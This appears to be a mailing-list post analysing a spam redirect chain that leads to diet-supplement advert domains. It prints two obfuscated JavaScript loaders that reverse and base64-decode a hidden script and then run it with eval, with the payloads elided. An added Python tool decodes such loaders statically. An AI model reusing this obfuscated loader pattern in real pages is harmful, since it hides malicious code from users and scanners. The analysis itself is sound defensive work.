In message <15749.1467320923@server1.tristatelogic.com>, I wrote:
Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL:
http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33
There is another redirection once you get there.
The additional redirection takes you to:

http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/

Note however that the content being served up here is *only* an advert for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript malware.

I have yet to figure this out exactly. Some of the time, these sites serve up unambiguous (and heavily encoded) Javascript malware. (See below.) Other times, they don't. I confess that I haven't figured out the pattern yet, or even whether it is a time-dependent thing.

Regards,
rfg

malware sample 1:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
/* Second stage stored as a reversed base64 string; the encoded blob is elided here. */
var _1Ol='==...';
/* Hand-rolled base64 decoder over the standard alphabet ('=' padding is index 64). */
function _0l0(data){
  var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
  do{
    h1=OOIlOI.indexOf(data.charAt(i++));
    h2=OOIlOI.indexOf(data.charAt(i++));
    h3=OOIlOI.indexOf(data.charAt(i++));
    h4=OOIlOI.indexOf(data.charAt(i++));
    bits=h1<<18|h2<<12|h3<<6|h4;
    o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;
    if(h3==64){enc+=String.fromCharCode(o1)}
    else if(h4==64){enc+=String.fromCharCode(o1,o2)}
    else{enc+=String.fromCharCode(o1,o2,o3)}
  }while(i<data.length);
  return enc
}
/* Reverses a string: the payload is stored backwards so the base64 is not obvious at a glance. */
function OOI(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
/* Reverse, base64-decode, then execute the recovered script. */
eval(_0l0(OOI(_1Ol)));
</script>
</head>
<body>
</body>
</html>
==============================================================================

Malware sample 2:
==============================================================================
<!DOCTYPE html>
<html>
<head>
<script language="javascript" type="text/javascript">
/* Same loader as sample 1 with renamed identifiers; the encoded blob is elided here. */
var I1O='...';
/* Hand-rolled base64 decoder over the standard alphabet ('=' padding is index 64). */
function OlI(data){
  var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';
  do{
    h1=_011lOI.indexOf(data.charAt(i++));
    h2=_011lOI.indexOf(data.charAt(i++));
    h3=_011lOI.indexOf(data.charAt(i++));
    h4=_011lOI.indexOf(data.charAt(i++));
    bits=h1<<18|h2<<12|h3<<6|h4;
    o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;
    if(h3==64){enc+=String.fromCharCode(o1)}
    else if(h4==64){enc+=String.fromCharCode(o1,o2)}
    else{enc+=String.fromCharCode(o1,o2,o3)}
  }while(i<data.length);
  return enc
}
/* Reverses a string: the payload is stored backwards so the base64 is not obvious at a glance. */
function _011(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }
/* Reverse, base64-decode, then execute the recovered script. */
eval(OlI(_011(I1O)));
</script>
</head>
<body>
</body>
</html>
==============================================================================
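A static decoder for the reverse-then-base64 loader shown in both samples, added here as an example and not code from the original post. It assumes the loader keeps the `var NAME='...'` literal and the `eval(decoder(reverser(NAME)))` call seen above, and it runs on a constructed loader with a harmless second stage, so the hidden script is recovered without ever being executed.

```python
"""Recover the second stage from a reverse-then-base64 JavaScript loader
without executing it. The loader's hand-rolled decoder is plain standard
base64, so the Python standard library undoes it exactly."""
import base64
import re
from typing import Optional

# The payload literal: var _1Ol='...';  (decoder alphabets use double quotes)
VAR_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")
# The final eval(decoder(reverser(VAR))) call; captures VAR.
EVAL_RE = re.compile(r"eval\(\s*\w+\(\s*\w+\(\s*(\w+)\s*\)\s*\)\s*\)")


def decode_loader_payload(html: str) -> Optional[str]:
    """Return the hidden second-stage script, or None when the page does not
    carry the eval(decoder(reverser(VAR))) pattern or the blob is not base64."""
    m = EVAL_RE.search(html)
    if not m:
        return None
    literals = dict(VAR_RE.findall(html))
    encoded = literals.get(m.group(1))
    if encoded is None:
        return None
    # Undo the obfuscation in the loader's own order: reverse the string
    # first, then base64-decode. validate=True rejects anything that is not
    # real base64 instead of silently producing garbage.
    try:
        raw = base64.b64decode(encoded[::-1], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-8", errors="replace")


# Constructed sample loader (not one of the samples above): a harmless second
# stage, base64-encoded and then reversed exactly as the real loaders do.
SECOND_STAGE = 'document.title = "decoded";'
CONSTRUCTED_LOADER = (
    "<html><head><script>var _1Ol='"
    + base64.b64encode(SECOND_STAGE.encode())[::-1].decode()
    + "';function _0l0(d){/* base64 decoder */}function OOI(s){/* reverse */}"
    "eval(_0l0(OOI(_1Ol)));</script></head><body></body></html>"
)

if __name__ == "__main__":
    print(decode_loader_payload(CONSTRUCTED_LOADER))
```

On a real sample, hand the saved HTML to `decode_loader_payload` and read the returned script; a None result means the loader has changed shape and needs a look by hand.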